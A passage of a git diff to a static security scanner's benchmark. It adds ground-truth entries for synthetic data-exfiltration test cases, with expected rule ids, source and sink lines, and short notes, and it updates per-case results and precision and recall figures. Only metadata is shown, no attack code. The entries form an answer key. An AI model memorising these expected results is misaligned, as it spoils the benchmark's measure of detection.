"disabled": false, + "notes": "TypeScript variant of js-data_exfil-001." + }, + { + "case_id": "ts-data_exfil-002", + "file": "typescript/data_exfil/exfil_fetch_header_body.ts", + "language": "typescript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "header" + ], + "disabled": false, + "notes": "Authorization header flows into fetch body at hardcoded URL." + }, + { + "case_id": "py-data_exfil-001", + "file": "python/data_exfil/exfil_requests_post_env_dict.py", + "language": "python", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [14, 14] + ], + "expected_source_lines": [ + [12, 13] + ], + "tags": [ + "data_exfil", + "requests", + "env", + "container" + ], + "disabled": false, + "notes": "Env-config secrets accumulate into a dict, then flow as the json kwarg of requests.post; container-taint round-trip." + }, + { + "case_id": "py-data_exfil-002", + "file": "python/data_exfil/exfil_httpx_async_post_env.py", + "language": "python", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [12, 15] + ], + "expected_source_lines": [ + [11, 11] + ], + "tags": [ + "data_exfil", + "httpx", + "async", + "env" + ], + "disabled": false, + "notes": "Env-config secret flows into httpx.AsyncClient().post json kwarg via the type-qualified HttpClient.post matcher." + }, + { + "case_id": "java-data_exfil-001", + "file": "java/data_exfil/DataExfilJdkHttpClient.java", + "language": "java", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [16, 20] + ], + "expected_source_lines": [ + [13, 14] + ], + "tags": [ + "data_exfil", + "jdk-httpclient", + "cookie" + ], + "disabled": false, + "notes": "Servlet cookie value flows through BodyPublishers.ofString into HttpClient.send body." + }, + { + "case_id": "java-data_exfil-002", + "file": "java/data_exfil/DataExfilOkHttp.java", + "language": "java", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [15, 21] + ], + "expected_source_lines": [ + [13, 13] + ], + "tags": [ + "data_exfil", + "okhttp", + "session" + ], + "disabled": false, + "notes": "HttpSession attribute wraps via RequestBody.create and binds to OkHttp Request.Builder.post; chain-normalized newCall.execute fires DATA_EXFIL." + }, + { + "case_id": "go-data_exfil-001", + "file": "go/data_exfil/exfil_http_post_cookie_body.go", + "language": "go", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [12, 12] + ], + "expected_source_lines": [ + [10, 11] + ], + "tags": [ + "data_exfil", + "http-post", + "cookie" + ], + "disabled": false, + "notes": "Cookie value flows via strings.NewReader into http.Post body at hardcoded URL." + }, + { + "case_id": "rs-data_exfil-001", + "file": "rust/data_exfil/exfil_reqwest_form_env.rs", + "language": "rust", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [5, 8] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "reqwest", + "form", + "env" + ], + "disabled": false, + "notes": "env::var secret flows into reqwest .form() body chain via the form.send body-bind matcher." + }, + { + "case_id": "rb-data_exfil-001", + "file": "ruby/data_exfil/exfil_net_http_post_cookie.rb", + "language": "ruby", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [9, 9] + ], + "expected_source_lines": [ + [7, 7] + ], + "tags": [ + "data_exfil", + "net-http", + "cookie" + ], + "disabled": false, + "notes": "request.cookies value flows into Net::HTTP.post body at hardcoded URL." + }, + { + "case_id": "c-data_exfil-001", + "file": "c/data_exfil/exfil_curl_postfields_env.c", + "language": "c", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [14, 14] + ], + "expected_source_lines": [ + [9, 9] + ], + "tags": [ + "data_exfil", + "curl", + "gated-sink", + "env" + ], + "disabled": false, + "notes": "getenv secret flows into curl_easy_setopt CURLOPT_POSTFIELDS body; gated-sink fires only at the body-binding setopt." + }, + { + "case_id": "js-safe-data_exfil-001", + "file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js", + "language": "javascript", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "sanitizer-wrap" + ], + "disabled": false, + "notes": "Cookie source routed through default forwarding-wrapper sanitizer (logEvent); DATA_EXFIL must not fire." + }, + { + "case_id": "js-safe-data_exfil-002", + "file": "javascript/safe/safe_data_exfil_user_input_echo.js", + "language": "javascript", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "Plain user input echoed into fetch body at fixed URL; sensitivity-gate suppresses Plain-tier sources for Cap::DATA_EXFIL." + }, + { + "case_id": "py-safe-data_exfil-001", + "file": "python/safe/safe_data_exfil_user_input_echo.py", + "language": "python", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "Flask form-field echoed into requests.post json at fixed URL; sensitivity-gate suppresses Plain-tier user input." + }, + { + "case_id": "go-safe-data_exfil-001", + "file": "go/safe/safe_data_exfil_user_input_echo.go", + "language": "go", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "FormValue plain user input echoed into http.Post body at fixed URL; sensitivity-gate suppresses Plain-tier sources." + }, + { + "case_id": "rb-safe-data_exfil-001", + "file": "ruby/safe/safe_data_exfil_user_input_echo.rb", + "language": "ruby", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "params plain user input echoed into RestClient.post body at fixed URL; sensitivity-gate suppresses Plain-tier sources." + }, + { + "case_id": "c-safe-data_exfil-001", + "file": "c/safe/safe_data_exfil_user_input_echo.c", + "language": "c", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "fgets stdin user input echoed into curl_easy_setopt CURLOPT_POSTFIELDS at fixed URL; sensitivity-gate suppresses Plain-tier sources." } ] } diff --git a/tests/benchmark/results/latest.json b/tests/benchmark/results/latest.json index 25a5477a..136163f1 100644 --- a/tests/benchmark/results/latest.json +++ b/tests/benchmark/results/latest.json @@ -1,6 +1,6 @@ { "benchmark_version": "1.0", - "timestamp": "2026-04-29T21:50:34Z", + "timestamp": "2026-04-30T23:44:32Z", "scanner_version": "0.5.0", "scanner_config": { "analysis_mode": "Full", @@ -9,9 +9,9 @@ "state_analysis_enabled": true, "worker_threads": 1 }, - "ground_truth_hash": "sha256:5b391d654f88673e5a200af875d513cf83812af747739395e8315768b8983ce3", - "corpus_size": 458, - "cases_run": 457, + "ground_truth_hash": "sha256:228d1577d9560cfa08521e783ec513509363470455743a43a4102df713af1849", + "corpus_size": 477, + "cases_run": 476, "cases_skipped": 1, "outcomes": [ { @@ -181,6 +181,25 @@ "security_finding_count": 2, "non_security_finding_count": 0 }, + { + "case_id": "c-data_exfil-001", + "file": "c/data_exfil/exfil_curl_postfields_env.c", + "language": "c", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 9:19)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 9:19)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "c-fmt-001", "file": "c/fmt_string/fmt_printf.c", @@ -455,6 +474,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "c-safe-data_exfil-001", + "file": "c/safe/safe_data_exfil_user_input_echo.c", + "language": "c", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "c-ssrf-001", "file": "c/ssrf/ssrf_curl.c", @@ -1685,11 +1719,14 @@ "matched_rule_ids": [ "rb.deser.yaml_load" ], - "unexpected_rule_ids": [], + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], "all_finding_ids": [ + "cfg-unguarded-sink", "rb.deser.yaml_load" ], - "security_finding_count": 1, + "security_finding_count": 2, "non_security_finding_count": 0 }, { @@ -2066,6 +2103,25 @@ "security_finding_count": 3, "non_security_finding_count": 0 }, + { + "case_id": "go-data_exfil-001", + "file": "go/data_exfil/exfil_http_post_cookie_body.go", + "language": "go", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 11:10)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 11:10)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "go-fmt_string-001", "file": "go/fmt_string/fmt_injection.go", @@ -2453,6 +2509,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "go-safe-data_exfil-001", + "file": "go/safe/safe_data_exfil_user_input_echo.go", + "language": "go", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "go-safe-fieldproj-phase3", "file": "go/safe/safe_chained_receiver_field_proj.go", @@ -2660,15 +2731,13 @@ "outcome_rule_level": "TP", "outcome_location_level": "TP", "matched_rule_ids": [ - "taint-unsanitised-flow (source 8:9)", "taint-unsanitised-flow (source 8:9)" ], "unexpected_rule_ids": [], "all_finding_ids": [ - "taint-unsanitised-flow (source 8:9)", "taint-unsanitised-flow (source 8:9)" ], - "security_finding_count": 2, + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -2840,6 +2909,44 @@ "security_finding_count": 2, "non_security_finding_count": 0 }, + { + "case_id": "java-data_exfil-001", + "file": "java/data_exfil/DataExfilJdkHttpClient.java", + "language": "java", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 14:28)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 14:28)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "java-data_exfil-002", + "file": "java/data_exfil/DataExfilOkHttp.java", + "language": "java", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 14:33)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 14:33)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "java-deser-001", "file": "java/deser/DeserOis.java", @@ -3005,13 +3112,17 @@ "language": "java", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3095,13 +3206,17 @@ "language": "java", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3321,14 +3436,14 @@ "vuln_class": "ssrf", "is_vulnerable": true, "outcome_file_level": "TP", - "outcome_rule_level": "TP", - "outcome_location_level": "TP", - "matched_rule_ids": [ - "taint-unsanitised-flow (source 7:22)" + "outcome_rule_level": "FN", + "outcome_location_level": "FN", + "matched_rule_ids": [], + "unexpected_rule_ids": [ + "taint-data-exfiltration (source 7:22)" ], - "unexpected_rule_ids": [], "all_finding_ids": [ - "taint-unsanitised-flow (source 7:22)" + "taint-data-exfiltration (source 7:22)" ], "security_finding_count": 1, "non_security_finding_count": 0 @@ -3358,13 +3473,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3465,6 +3584,63 @@ "security_finding_count": 2, "non_security_finding_count": 0 }, + { + "case_id": "js-data_exfil-001", + "file": "javascript/data_exfil/exfil_fetch_cookie_body.js", + "language": "javascript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "js-data_exfil-002", + "file": "javascript/data_exfil/exfil_fetch_external_destination.js", + "language": "javascript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "js-data_exfil-003", + "file": "javascript/data_exfil/exfil_xhr_send_header.js", + "language": "javascript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "js-destructure-sanitize-001", "file": "javascript/safe/safe_object_destructure_sanitize.js", @@ -3558,13 +3734,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3588,13 +3768,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3678,13 +3862,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3732,6 +3920,36 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "js-safe-data_exfil-001", + "file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js", + "language": "javascript", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, + { + "case_id": "js-safe-data_exfil-002", + "file": "javascript/safe/safe_data_exfil_user_input_echo.js", + "language": "javascript", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "js-safe-parseInt-001", "file": "javascript/safe/safe_parseInt.js", @@ -3882,11 +4100,11 @@ "outcome_rule_level": "TP", "outcome_location_level": "TP", "matched_rule_ids": [ - "taint-unsanitised-flow (source 5:5)" + "cfg-unguarded-sink" ], "unexpected_rule_ids": [], "all_finding_ids": [ - "taint-unsanitised-flow (source 5:5)" + "cfg-unguarded-sink" ], "security_finding_count": 1, "non_security_finding_count": 0 @@ -4971,6 +5189,44 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "py-data_exfil-001", + "file": "python/data_exfil/exfil_requests_post_env_dict.py", + "language": "python", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 14:25)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 14:25)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "py-data_exfil-002", + "file": "python/data_exfil/exfil_httpx_async_post_env.py", + "language": "python", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 12:15)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 12:15)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "py-deser-001", "file": "python/deser/deser_pickle.py", @@ -5228,6 +5484,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "py-safe-data_exfil-001", + "file": "python/safe/safe_data_exfil_user_input_echo.py", + "language": "python", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "py-safe-int-001", "file": "python/safe/safe_int_cast.py", @@ -5425,6 +5696,25 @@ "security_finding_count": 1, "non_security_finding_count": 0 }, + { + "case_id": "rb-data_exfil-001", + "file": "ruby/data_exfil/exfil_net_http_post_cookie.rb", + "language": "ruby", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 7:9)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 7:9)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "rb-interproc-001", "file": "ruby/interprocedural/interproc_taint_propagation.rb", @@ -5504,6 +5794,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "rb-safe-data_exfil-001", + "file": "ruby/safe/safe_data_exfil_user_input_echo.rb", + "language": "ruby", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "rs-auth-001", "file": "rust/auth/actix_scoped_write_missing.rs", @@ -6179,6 +6484,26 @@ "security_finding_count": 1, "non_security_finding_count": 2 }, + { + "case_id": "rs-data_exfil-001", + "file": "rust/data_exfil/exfil_reqwest_form_env.rs", + "language": "rust", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:18)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "rs.quality.unwrap", + "taint-data-exfiltration (source 5:18)" + ], + "security_finding_count": 1, + "non_security_finding_count": 1 + }, { "case_id": "rs-deser-001", "file": "rust/deser/deser_serde_yaml.rs", @@ -6717,15 +7042,15 @@ "vuln_class": "ssrf", "is_vulnerable": true, "outcome_file_level": "TP", - "outcome_rule_level": "TP", - "outcome_location_level": "TP", - "matched_rule_ids": [ - "taint-unsanitised-flow (source 4:15)" + "outcome_rule_level": "FN", + "outcome_location_level": "FN", + "matched_rule_ids": [], + "unexpected_rule_ids": [ + "taint-data-exfiltration (source 4:15)" ], - "unexpected_rule_ids": [], "all_finding_ids": [ "rs.quality.unwrap", - "taint-unsanitised-flow (source 4:15)" + "taint-data-exfiltration (source 4:15)" ], "security_finding_count": 1, "non_security_finding_count": 1 @@ -7495,6 +7820,44 @@ "security_finding_count": 1, "non_security_finding_count": 0 }, + { + "case_id": "ts-data_exfil-001", + "file": "typescript/data_exfil/exfil_fetch_cookie_body.ts", + "language": "typescript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "ts-data_exfil-002", + "file": "typescript/data_exfil/exfil_fetch_header_body.ts", + "language": "typescript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "ts-iife-closure-001", "file": "typescript/safe/safe_iife_closure_sanitizer.ts", @@ -8043,13 +8406,15 @@ "outcome_rule_level": "TP", "outcome_location_level": "TP", "matched_rule_ids": [ + "cfg-unguarded-sink", "cfg-unguarded-sink" ], "unexpected_rule_ids": [], "all_finding_ids": [ + "cfg-unguarded-sink", "cfg-unguarded-sink" ], - "security_finding_count": 1, + "security_finding_count": 2, "non_security_finding_count": 0 }, { @@ -8193,29 +8558,29 @@ } ], "aggregate_file_level": { - "tp": 225, - "fp": 1, + "tp": 238, + "fp": 7, "fn_": 0, "tn": 231, - "precision": 0.995575221238938, + "precision": 0.9714285714285714, "recall": 1.0, - "f1": 0.9977827050997783 + "f1": 0.9855072463768115 }, "aggregate_rule_level": { - "tp": 225, - "fp": 1, - "fn_": 0, + "tp": 236, + "fp": 7, + "fn_": 2, "tn": 231, - "precision": 0.995575221238938, - "recall": 1.0, - "f1": 0.9977827050997783 + "precision": 0.9711934156378601, + "recall": 0.9915966386554622, + "f1": 0.9812889812889812 }, "by_language": { "c": { - "tp": 15, + "tp": 16, "fp": 0, "fn_": 0, - "tn": 15, + "tn": 16, "precision": 1.0, "recall": 1.0, "f1": 1.0 @@ -8230,31 +8595,31 @@ "f1": 1.0 }, "go": { - "tp": 25, + "tp": 26, "fp": 1, "fn_": 0, - "tn": 28, - "precision": 0.9615384615384616, + "tn": 29, + "precision": 0.9629629629629629, "recall": 1.0, - "f1": 0.9803921568627451 + "f1": 0.9811320754716981 }, "java": { - "tp": 19, - "fp": 0, - "fn_": 0, - "tn": 20, - "precision": 1.0, - "recall": 1.0, - "f1": 1.0 + "tp": 20, + "fp": 2, + "fn_": 1, + "tn": 18, + "precision": 0.9090909090909091, + "recall": 0.9523809523809523, + "f1": 0.9302325581395349 }, "javascript": { - "tp": 19, - "fp": 0, + "tp": 22, + "fp": 4, "fn_": 0, - "tn": 24, - "precision": 1.0, + "tn": 22, + "precision": 0.8461538461538461, "recall": 1.0, - "f1": 1.0 + "f1": 0.9166666666666666 }, "php": { "tp": 18, @@ -8266,19 +8631,19 @@ "f1": 1.0 }, "python": { - "tp": 26, + "tp": 28, "fp": 0, "fn_": 0, - "tn": 28, + "tn": 29, "precision": 1.0, "recall": 1.0, "f1": 1.0 }, "ruby": { - "tp": 19, + "tp": 20, "fp": 0, "fn_": 0, - "tn": 20, + "tn": 21, "precision": 1.0, "recall": 1.0, "f1": 1.0 @@ -8286,14 +8651,14 @@ "rust": { "tp": 34, "fp": 0, - 